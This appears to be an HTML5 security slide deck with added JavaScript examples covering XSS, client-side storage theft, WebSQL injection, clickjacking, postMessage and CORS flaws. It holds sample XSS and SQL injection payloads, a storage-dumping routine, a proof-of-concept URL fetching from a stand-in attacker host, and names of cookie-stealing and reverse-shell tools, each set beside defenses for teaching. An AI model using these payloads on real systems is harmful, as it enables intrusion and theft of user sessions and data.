This document discusses HTML5 security threats and defenses. It covers the history of HTML standards, new HTML5 features, and vulnerabilities like XSS, cookie/storage stealing, SQL injection, and more. It also provides tools for analyzing HTML5 threats and examples of real attacks exploiting features like WebSQL, local storage, and cross-origin requests. Defenses include input validation, avoiding sensitive data storage, and configuring CORS headers appropriately.
2. Introduction to HTML5
HTML5 threat model
Vulnerabilities & Defense
Tools
Reference
3. History
HTML 1.0: June 1993, never standardized
HTML 2.0: November 1995, RFC 1866
HTML 3.2: 14 January 1997, W3C Recommendation
HTML 4.0: 18 December 1997, W3C Recommendation
HTML 4.01: 24 December 1999, W3C Recommendation
XHTML 1.0: 26 January 2000, W3C Recommendation
HTML5: 2008 first public Working Draft
December 2012 W3C Candidate Recommendation (W3C Recommendation in October 2014)
4. Features
The three aspects of HTML5
▪ Content: HTML, with new tags and attributes
▪ Presentation of content: CSS
▪ Interaction with content: JavaScript, with new APIs (drag and drop, localStorage, Web Workers, etc.)
8. XSS abuse with new tags and attributes
Hiding URL code
Stealing from client-side storage
Injecting into and exploiting WebSQL
ClickJacking and CookieJacking
Cross-origin requests and postMessage
Client-side file includes
Botnets and widgets
9. In:
New tags: <video>, <audio>, <article>, <footer>, <nav>
New attributes for <input>: autocomplete, autofocus, pattern (a regular expression the browser validates against)
New media events
New <canvas> tag for 2D rendering
New form controls for date and time
Geolocation
New selectors
Client-side storage: localStorage, sessionStorage and WebSQL
Out:
Presentation elements such as <font>, <center>
Presentation attributes such as align, border
<frame>, <frameset>
<applet>
Old special effects: <marquee>, <bgsound>
10. Attack:
New XSS vectors: the new tags and attributes carry event handlers that existing filters have never seen
Bypass of block-list filters
Defense:
Add the new tags and attributes to the block-list and update the regexes (fragile: every new element or handler reopens the gap)
Prefer allow-list sanitization and context-aware output encoding over block-lists
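Added example, not code from the original slides: a block-list filter of the kind the slide describes, a set of HTML5 payloads that pass straight through it, and the two defenses that do hold (encoding for text contexts, an allow-list for limited markup). The payload strings, the block-list contents and the allowed tag set are constructed for the illustration.

```javascript
// Added example (not from the original slides): why a block-list XSS filter
// fails against HTML5 event handlers, and what the allow-list/encoding
// alternatives look like. Payloads and lists below are constructed samples.

// A block-list filter of the kind the slide describes: it knows <script>,
// a handful of classic handlers and the javascript: scheme, nothing else.
const BLOCK_LIST = [
  /<script\b[^>]*>[\s\S]*?<\/script>/gi,
  /\son(load|error|click|mouseover|mouseout)\s*=/gi,
  /javascript\s*:/gi,
];
function blockListFilter(html) {
  return BLOCK_LIST.reduce((out, re) => out.replace(re, ''), html);
}

// HTML5 vectors the block-list never mentions (constructed samples).
const HTML5_VECTORS = [
  '<input autofocus onfocus=alert(1)>',            // fires without user interaction
  '<details open ontoggle=alert(1)>',              // fires when the element opens
  '<video src=x onloadstart=alert(1)>',            // media event, bogus src is enough
  '<svg><animate onbegin=alert(1) attributeName=x dur=1s></animate></svg>',
  '<body onpageshow=alert(1)>',
];

// Generic detection: any attribute whose name starts with "on", in any tag.
// Used here to judge a filter's output, not as a filter in itself.
const ANY_HANDLER = /<[^>]*\son[a-z]+\s*=/i;
function containsEventHandler(html) {
  return ANY_HANDLER.test(html);
}

// Defense 1: when the input is supposed to be text, do not filter, encode.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Defense 2: when limited markup is required, allow-list the tag names and
// drop every attribute; anything else is encoded. Regex tokenising is only
// acceptable for this illustration; production code should use a sanitizer
// built on the browser's own parser (DOMPurify, for example).
const ALLOWED_TAGS = new Set(['b', 'i', 'em', 'strong', 'p', 'br']);
function allowListSanitize(html) {
  return html.replace(/<\/?([a-zA-Z][a-zA-Z0-9]*)\b[^>]*>|[<>&"']/g, (m, tag) => {
    if (tag && ALLOWED_TAGS.has(tag.toLowerCase())) {
      const name = tag.toLowerCase();
      return m.startsWith('</') ? `</${name}>` : `<${name}>`;
    }
    return escapeHtml(m);
  });
}

// Run a filter over the vectors and return the ones that still carry a
// handler afterwards, i.e. the filter's misses.
function auditFilter(filter, vectors = HTML5_VECTORS) {
  return vectors.filter((v) => containsEventHandler(filter(v)));
}

console.log('block-list misses:', auditFilter(blockListFilter).length, 'of', HTML5_VECTORS.length);
console.log('escapeHtml misses:', auditFilter(escapeHtml).length);
console.log('allow-list misses:', auditFilter(allowListSanitize).length);
```

The block-list strips the classic `<img onerror>` vector and nothing else; the generic handler check behind `auditFilter` is the kind of test worth keeping in a project's test suite so that a filter change is measured against a corpus of payloads rather than against the two or three the author remembered.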
12. DOM
window.history.back();
window.history.forward();
window.history.go();
HTML5
history.pushState()
▪ history.pushState(stateObject, title, URL);
history.replaceState()
▪ Same arguments as pushState, but modifies the current history entry instead of adding a new one
Both rewrite the address bar without a navigation (same-origin URLs only), which is how a payload delivered in the URL can hide itself once it has run
15. Type
localStorage: long-term storage, persists until explicitly cleared
sessionStorage: per tab or window, cleared when the tab or browser is closed
Differences
Cookies: about 4 KB each, sent to the server with every request
localStorage / sessionStorage: browser-dependent limit (usually 5 MB), never sent to the server automatically
Support
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
18. Attack
Read the data out of the storage (session identifiers, passwords, etc.) from any script running on the origin
Store XSS payloads in the storage so they persist and run again on later visits
No path restriction: unlike cookies, storage is scoped to the origin as a whole, so an XSS anywhere on the origin reaches all of it
Defense
Don't store sensitive data in local storage
Don't use local storage for session identifiers
Stick with cookies and use the HttpOnly and Secure flags (current browsers add SameSite)
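Added example, not code from the original slides: the enumeration loop an XSS payload runs against client-side storage, followed by the same loop used as a self-audit that flags session identifiers, passwords and JWT-shaped values. Browser Storage objects and document.cookie are replaced by constructed in-memory stand-ins so the script runs under Node; in a browser console the real window.localStorage, window.sessionStorage and document.cookie are passed instead. Key names and values are made up for the illustration.

```javascript
// Added example (not from the original slides): dump everything script can
// reach in client-side storage, then audit it. The Storage stand-in and the
// sample contents are constructed.

// Minimal stand-in exposing the Storage interface the loop relies on.
function fakeStorage(entries) {
  const keys = Object.keys(entries);
  return {
    get length() { return keys.length; },
    key: (i) => keys[i] ?? null,
    getItem: (k) => (k in entries ? entries[k] : null),
  };
}

// Constructed sample state for one origin. Note that HttpOnly cookies never
// appear in the cookie string; that is exactly what the flag buys you.
const SAMPLE = {
  localStorage: fakeStorage({
    theme: 'dark',
    sessionId: '5f3a9c0e1b2d4f6a8c7e9d0b1a2c3d4e',
    user: 'eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiI0MiJ9.c2lnbmF0dXJl',
  }),
  sessionStorage: fakeStorage({ cart: '[1,2,3]', password: 'hunter2' }),
  cookie: 'lang=en; remember_token=r0ttyz9',
};

// Step 1: what an attacker's script exfiltrates. Storage is enumerated by
// index; the cookie string is split into name/value pairs.
function dumpClientSideStorage({ localStorage, sessionStorage, cookie }) {
  const readAll = (s) => {
    const out = {};
    for (let i = 0; i < s.length; i++) {
      const k = s.key(i);
      out[k] = s.getItem(k);
    }
    return out;
  };
  const cookies = {};
  for (const part of cookie.split(';')) {
    const [name, ...rest] = part.trim().split('=');
    if (name) cookies[name] = rest.join('=');
  }
  return { localStorage: readAll(localStorage), sessionStorage: readAll(sessionStorage), cookies };
}

// Step 2: what should not have been reachable. Credential-looking key names
// and JWT-shaped values (three base64url segments) are findings; a script-
// readable cookie with such a name means HttpOnly is missing.
const SENSITIVE_KEY = /(session|token|auth|passw|secret|jwt)/i;
const JWT_VALUE = /^[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+$/;
function auditStorage(dump) {
  const findings = [];
  for (const area of ['localStorage', 'sessionStorage', 'cookies']) {
    for (const [key, value] of Object.entries(dump[area])) {
      if (SENSITIVE_KEY.test(key)) findings.push({ area, key, reason: 'sensitive key name' });
      else if (JWT_VALUE.test(value)) findings.push({ area, key, reason: 'JWT-shaped value' });
    }
  }
  return findings;
}

console.log(auditStorage(dumpClientSideStorage(SAMPLE)));
```

The dump is the attack; the audit is the defence check. Run against a real application it lists exactly the items the slide says should never be in storage, and the cookie findings are the ones to fix with HttpOnly.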
20. Database Storage (WebSQL)
Similar to the Google Gears database API; never standardized (the W3C stopped work on it in 2010) and since removed from current browsers
Operate
var db = openDatabase("Database Name", "Database Version", "Database Description", estimatedSizeInBytes);
db.transaction(function (tx) {
  tx.executeSql("YOUR SQL STATEMENT HERE", [parameters], successCallback, errorCallback);
});
Type
SQLite (WebKit-based browsers)
21. Attack
Store shellcode (payloads) in the database
SQL injection
Defense
Stick to parameterized SQL (the ? placeholders of executeSql)
Encode the SQL results before displaying them
Don't store sensitive data
23. SQL Injection
Use sqlite_master to enumerate the schema
▪ SELECT name FROM sqlite_master WHERE type='table'
▪ SELECT sql FROM sqlite_master WHERE name='table_name'
▪ SELECT sqlite_version()
Select with ? placeholders
▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); vulnerable: the input becomes part of the SQL text
▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); safe: the input is bound as a parameter
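Added example, not code from the original slides: the two executeSql calls from the slide side by side, driven by the tautology and sqlite_master probes the slide lists. openDatabase does not exist under Node, so a constructed stub records the SQL text and parameter list each call hands to the engine; the table and column names (stud, id, name) are the slide's own, the database name in the browser wiring is an assumption.

```javascript
// Added example (not from the original slides): concatenated versus bound
// executeSql, exercised with constructed injection payloads against a stub
// transaction object.

// Attacker inputs: a tautology, then the slide's sqlite_master probes turned
// into UNION payloads that the vulnerable query would execute.
const PAYLOADS = [
  '1 OR 1=1',
  "0 UNION SELECT name FROM sqlite_master WHERE type='table'",
  "0 UNION SELECT sql FROM sqlite_master WHERE name='stud'",
  '0 UNION SELECT sqlite_version()',
];

// Vulnerable: the input is spliced into the statement text.
function lookupVulnerable(tx, inputId) {
  return tx.executeSql('SELECT name FROM stud WHERE id=' + inputId);
}

// Fixed: the input travels as a bound parameter and is never parsed as SQL.
function lookupSafe(tx, inputId) {
  return tx.executeSql('SELECT name FROM stud WHERE id=?', [inputId]);
}

// Stub for the transaction object that db.transaction(cb) passes to cb:
// records what would reach SQLite instead of executing it.
function recordingTx() {
  const calls = [];
  return {
    calls,
    executeSql(sql, params = []) {
      calls.push({ sql, params });
      return { sql, params };
    },
  };
}

// Crude indicator that the statement text no longer compares a single id.
function looksInjected(sql) {
  return /\bUNION\b|\bOR\b/i.test(sql);
}

// Compare both paths for every payload.
function demo() {
  return PAYLOADS.map((payload) => {
    const v = lookupVulnerable(recordingTx(), payload);
    const s = lookupSafe(recordingTx(), payload);
    return {
      payload,
      vulnerableSql: v.sql,
      vulnerableInjected: looksInjected(v.sql),
      safeSql: s.sql,
      safeParams: s.params,
      safeInjected: looksInjected(s.sql),
    };
  });
}

// The same safe call wired into a browser that still ships WebSQL (not run
// here). Results go through textContent, as the slide's "encode before
// display" rule requires. Database name and size are assumptions.
function lookupInBrowser(inputId, outputElement) {
  const db = openDatabase('school', '1.0', 'demo', 1024 * 1024);
  db.transaction((tx) => {
    tx.executeSql('SELECT name FROM stud WHERE id=?', [inputId],
      (t, rs) => {
        const names = [];
        for (let i = 0; i < rs.rows.length; i++) names.push(rs.rows.item(i).name);
        outputElement.textContent = names.join(', ');
      },
      (t, err) => console.error('query failed:', err.message));
  });
}

console.table(demo());
```

For the bound version every payload ends up as a string parameter that SQLite compares against `id` and finds no match; nothing in the statement text changes, which is the property to verify when reviewing code rather than "is the input escaped".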
24. Drag and drop basics
Drag data
The drag feedback image
Drag effects
Drag events: dragstart, dragenter, dragover, dragleave, drag, drop, dragend
28. CookieJacking
Combines several techniques to steal the user's local cookie files
Technique
How to read the local file: an iframe pointing at a file:// URL
How to get at the cookie contents: clickjacking (the user is tricked into selecting the framed text and dragging it to the attacker's page)
How to send the cookies out: SMB
30. Defense
Embed untrusted content in an iframe with the sandbox attribute, so its scripts cannot navigate the top window
Frame-busting for your own pages:
if (top !== window) top.location = window.location.href;
(the same check written as: if (top != self) top.location.href = self.location.href;)
Frame-busting scripts can be defeated (for instance by framing the page in a sandboxed iframe, which blocks the top navigation), so also send X-Frame-Options: DENY or a Content-Security-Policy with frame-ancestors
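Added example, not code from the original slides: anti-framing as a server-side control, which is what remains once the JavaScript frame-buster above is neutralised. antiFramingHeaders() builds the response headers; frameAncestorsAllows() applies the browser's CSP frame-ancestors matching (and the X-Frame-Options fallback) to a page origin and a would-be framer, so a policy can be checked before deployment. The origins used are constructed, and scheme-only sources are deliberately out of scope.

```javascript
// Added example (not from the original slides): generate anti-framing
// headers and evaluate them the way a browser would. Origins are constructed.

// Headers to send on every HTML response. X-Frame-Options is the legacy
// control; frame-ancestors is the CSP replacement and takes precedence in
// browsers that understand both.
function antiFramingHeaders(allowedAncestors = []) {
  const sources = allowedAncestors.length ? allowedAncestors.join(' ') : "'none'";
  const headers = { 'Content-Security-Policy': `frame-ancestors ${sources}` };
  if (allowedAncestors.length === 0) {
    headers['X-Frame-Options'] = 'DENY';
  } else if (allowedAncestors.length === 1 && allowedAncestors[0] === "'self'") {
    headers['X-Frame-Options'] = 'SAMEORIGIN';
  }
  return headers;
}

// Default ports per scheme, for matching sources that name a port.
function defaultPort(protocol) {
  return protocol === 'https:' ? '443' : '80';
}

// May a page served with `headers` from `pageOrigin` be framed by a document
// at `framerOrigin`? Supports 'none', 'self', explicit origins and a leading
// "*." host wildcard. Falls back to X-Frame-Options when CSP is absent.
function frameAncestorsAllows(headers, pageOrigin, framerOrigin) {
  const csp = headers['Content-Security-Policy'] || '';
  const directive = csp.split(';').map((d) => d.trim()).find((d) => d.startsWith('frame-ancestors'));
  if (!directive) {
    const xfo = (headers['X-Frame-Options'] || '').toUpperCase();
    if (xfo === 'DENY') return false;
    if (xfo === 'SAMEORIGIN') return pageOrigin === framerOrigin;
    return true; // no policy at all: anyone may frame the page
  }
  const sources = directive.split(/\s+/).slice(1);
  const framer = new URL(framerOrigin);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return framerOrigin === pageOrigin;
    const m = /^(?:(https?):\/\/)?(\*\.)?([^:/]+)(?::(\d+))?$/.exec(src);
    if (!m) return false;
    const [, scheme, wildcard, host, port] = m;
    if (scheme && scheme + ':' !== framer.protocol) return false;
    if (port && port !== (framer.port || defaultPort(framer.protocol))) return false;
    return wildcard ? framer.hostname.endsWith('.' + host) : framer.hostname === host;
  });
}

// A quick matrix for one page and a few framers (constructed).
function policyMatrix(headers, pageOrigin, framers) {
  return Object.fromEntries(framers.map((f) => [f, frameAncestorsAllows(headers, pageOrigin, f)]));
}

console.log(policyMatrix(antiFramingHeaders(["'self'", 'https://*.partner.example']),
  'https://app.example', ['https://app.example', 'https://portal.partner.example', 'https://evil.example']));
```

The deny-all form is the right default; an allow-list is only needed for pages that are meant to be embedded, and then the evaluator above is the check to run against every origin you expect and a few you do not.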
33. Defense
Check the postMessage origin (event.origin, compared exactly against an allow-list)
Don't use innerHTML
▪ element.innerHTML = e.data; // danger
▪ element.textContent = e.data; // safe
Don't use eval() to process the message
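Added example, not code from the original slides: a postMessage receiver that applies the three rules above, exercised with constructed message events instead of real cross-window traffic. The trusted origin, the element stand-in and the message shape are assumptions; in a browser the handler is registered with window.addEventListener('message', handler) and the element is a real DOM node.

```javascript
// Added example (not from the original slides): a message handler with an
// exact origin check, textContent rendering and no eval, plus the matching
// sender. Origins, element and events are constructed stand-ins.

const TRUSTED_ORIGINS = new Set(['https://widget.example']);

// Element stand-in with the two properties the handler touches.
function fakeElement() {
  return { innerHTML: '', textContent: '' };
}

// Build the receiver; `output` is the element that displays the message.
function makeMessageHandler(output, trustedOrigins = TRUSTED_ORIGINS) {
  return function onMessage(event) {
    // Rule 1: exact allow-list match on event.origin. A prefix test such as
    // origin.startsWith('https://widget.example') is bypassed by
    // https://widget.example.attacker.test, which is why the second event
    // below must be rejected.
    if (!trustedOrigins.has(event.origin)) return 'rejected';
    // Rule 3: the payload is data. Validate its shape; never eval() it.
    const data = event.data;
    if (typeof data !== 'object' || data === null || typeof data.text !== 'string') return 'malformed';
    // Rule 2: textContent, not innerHTML, so markup in the message is inert.
    output.textContent = data.text;
    return 'rendered';
  };
}

// Sender side: always name the target origin. A '*' target delivers the
// message to whatever document currently occupies the frame.
function sendToWidget(targetWindow, message) {
  targetWindow.postMessage(message, 'https://widget.example');
}

// Events shaped as a browser would deliver them (constructed).
function fakeEvent(origin, data) {
  return { origin, data, source: null };
}

function runDemo() {
  const out = fakeElement();
  const handler = makeMessageHandler(out);
  const results = [
    handler(fakeEvent('https://evil.example', { text: 'hi' })),
    handler(fakeEvent('https://widget.example.evil.example', { text: 'hi' })),
    handler(fakeEvent('https://widget.example', 'alert(1)')),
    handler(fakeEvent('https://widget.example', { text: '<img src=x onerror=alert(1)>' })),
  ];
  return { results, innerHTML: out.innerHTML, textContent: out.textContent };
}

console.log(runDemo());
```

The last message is accepted, because its origin is trusted, yet its `<img onerror>` payload ends up as literal text: the origin check decides who may talk to the page, and the sink choice decides what a trusted-but-compromised sender can still do.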
34. Cross-Origin Resource Sharing
▪ Originally Ajax calls were subject to the Same-Origin Policy: site A cannot read XMLHttpRequest responses from site B
▪ HTML5 (CORS) makes these cross-domain calls possible; the browser still enforces the policy, the server opts out of it per response
▪ Site A to site B: the response must include a header
▪ Access-Control-Allow-Origin: site A (required; "*" allows any origin but cannot be combined with credentials)
▪ Access-Control-Allow-Credentials: true | false (the caller's cookies are only usable when true, and then the allowed origin must be an exact match, never "*")
▪ Access-Control-Expose-Headers: the response headers the caller may read
▪ etc.
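Added example, not code from the original slides: the response headers from the slide generated two ways, the reflect-any-Origin version many servers ship and an allow-list version, plus a checker that applies the browser's read rules to the result. The API origins are constructed; the handler at the end has the shape of a Node http request handler but no server is started.

```javascript
// Added example (not from the original slides): weak and corrected CORS
// header generation, with a browser-side check. Origins are constructed.

const ALLOWED_ORIGINS = new Set(['https://app.example', 'https://admin.example']);

// Insecure: echoes whatever Origin the request carries and allows
// credentials, so any site can read authenticated responses from this API.
function corsHeadersReflectAll(requestOrigin) {
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Fixed: only allow-listed origins are echoed, unknown origins get no CORS
// headers at all, and Vary: Origin keeps caches from serving one origin's
// response to another.
function corsHeadersAllowList(requestOrigin, allowed = ALLOWED_ORIGINS) {
  if (!allowed.has(requestOrigin)) return { Vary: 'Origin' };
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Access-Control-Allow-Methods': 'GET, POST',
    'Access-Control-Allow-Headers': 'Content-Type',
    'Access-Control-Expose-Headers': 'X-Request-Id',
    Vary: 'Origin',
  };
}

// What the browser does with the response: may script at `requestOrigin`
// read it? "*" is refused for credentialed requests, and with credentials
// the origin must match exactly and Allow-Credentials must be "true".
function browserAllowsRead(headers, requestOrigin, withCredentials) {
  const acao = headers['Access-Control-Allow-Origin'];
  if (!acao) return false;
  if (acao === '*') return !withCredentials;
  if (acao !== requestOrigin) return false;
  if (withCredentials && headers['Access-Control-Allow-Credentials'] !== 'true') return false;
  return true;
}

// Wiring for a Node http handler (assumed route; not started here).
function handleApi(req, res) {
  const headers = corsHeadersAllowList(req.headers.origin);
  for (const [k, v] of Object.entries(headers)) res.setHeader(k, v);
  if (req.method === 'OPTIONS') { // preflight
    res.writeHead(204);
    res.end();
    return;
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ ok: true }));
}

console.log('reflect-all, evil origin, credentialed:',
  browserAllowsRead(corsHeadersReflectAll('https://evil.example'), 'https://evil.example', true));
console.log('allow-list, evil origin, credentialed:',
  browserAllowsRead(corsHeadersAllowList('https://evil.example'), 'https://evil.example', true));
```

The reflect-all variant is what a quick "make the error go away" fix produces; the test that catches it is the first assertion below, a credentialed read from an origin you never meant to trust.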
38. Code like this:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET", location.hash.substring(1));
x.onreadystatechange = function () {
  if (x.readyState == 4) {
    document.getElementById("main").innerHTML = x.responseText;
  }
};
x.send();
</script>
<div id="main"></div>
</body></html>
POC
Introducing cross-origin requests: http://example.com/#http://evil.site/payload.php
The contents of 'payload.php' will be included as HTML within <div id="main"></div> (the attacker's server sends an Access-Control-Allow-Origin header, so the browser lets the page read the response)
A new type of XSS: the page's own code fetches attacker-chosen content and renders it with innerHTML
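Added example, not code from the original slides: the hardened form of the snippet above. Two changes remove the bug: the fragment is resolved with the URL parser and must stay on the page's own origin, and the response is inserted as text rather than HTML. Network access and the DOM are replaced by constructed stand-ins (a page table and an element object) so the logic runs under Node; the page URLs and contents are made up.

```javascript
// Added example (not from the original slides): the safe replacement for
// "fetch whatever the fragment says and innerHTML it". Inputs are constructed.

// Resolve the fragment relative to the page and accept only same-origin
// http(s) targets. Returns null for everything else, including the
// cross-origin URL from the slide's PoC, protocol-relative forms such as
// "//evil.site/x", and non-http schemes.
function resolveFragmentTarget(hash, pageHref) {
  const raw = hash.startsWith('#') ? hash.slice(1) : hash;
  if (!raw) return null;
  let target;
  try {
    target = new URL(raw, pageHref);
  } catch {
    return null;
  }
  const page = new URL(pageHref);
  if (target.origin !== page.origin) return null;
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return null;
  return target.href;
}

// Load the target and render it as inert text. `fetchText` is injected so
// the network layer can be swapped (in a browser: an XMLHttpRequest or
// fetch() against the validated URL); `main` is the output element.
function loadIntoMain(location, main, fetchText) {
  const target = resolveFragmentTarget(location.hash, location.href);
  if (!target) {
    main.textContent = 'blocked';
    return 'blocked';
  }
  main.textContent = fetchText(target); // never innerHTML for fetched content
  return 'rendered';
}

// Constructed stand-ins: a table of same-origin pages and a blank element.
const PAGES = { 'http://example.com/news/today.html': '<b>Headline</b>' };
const fetchText = (url) => PAGES[url] ?? '';
function fakeElement() {
  return { innerHTML: '', textContent: '' };
}

function runDemo(hash) {
  const main = fakeElement();
  const status = loadIntoMain({ hash, href: 'http://example.com/' }, main, fetchText);
  return { status, innerHTML: main.innerHTML, textContent: main.textContent };
}

console.log(runDemo('#http://evil.site/payload.php'));
console.log(runDemo('#/news/today.html'));
```

If the feature genuinely needs to pull content from other origins, the allow-list belongs on the client too (a fixed set of origins compared against `target.origin`), and the rendering choice does not change: remote content is text unless it is passed through a sanitizer first.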
40. Web Workers
Run scripts in the background, independently of the page
Very simple
var w = new Worker("some_script.js");
w.onmessage = function (e) { /* do something with e.data */ };
w.terminate();
Access
▪ XHR, the navigator object, the application cache, spawning other workers!
Can't access
▪ DOM, window, document objects
41. Attack
Botnet (a page or widget keeps a worker running in every visitor's browser)
▪ Application-level DDoS attacks
▪ Email spam
▪ Distributed password cracking
Network scanning
Guessing the user's private IP address
▪ Identify the user's subnet
▪ Identify the IP address
43. HTML5CSdump
Applies the enumeration and extraction techniques described above to obtain all the client-side storage for a given domain name
JS-Recon
Port scans
Network scans
Detecting the private IP address
44. Imposter
Steal cookies
Set cookies
Steal Local Shared Objects (Flash cookies)
Steal stored passwords from Firefox
etc.
Shell of the Future
Reverse web shell handler
Bypasses anti-session-hijacking measures, since the requests are issued from the victim's own browser
45. Ravan
JavaScript-based distributed computing system for hash cracking
Hashing algorithms
▪ MD5
▪ SHA1
▪ SHA256
▪ SHA512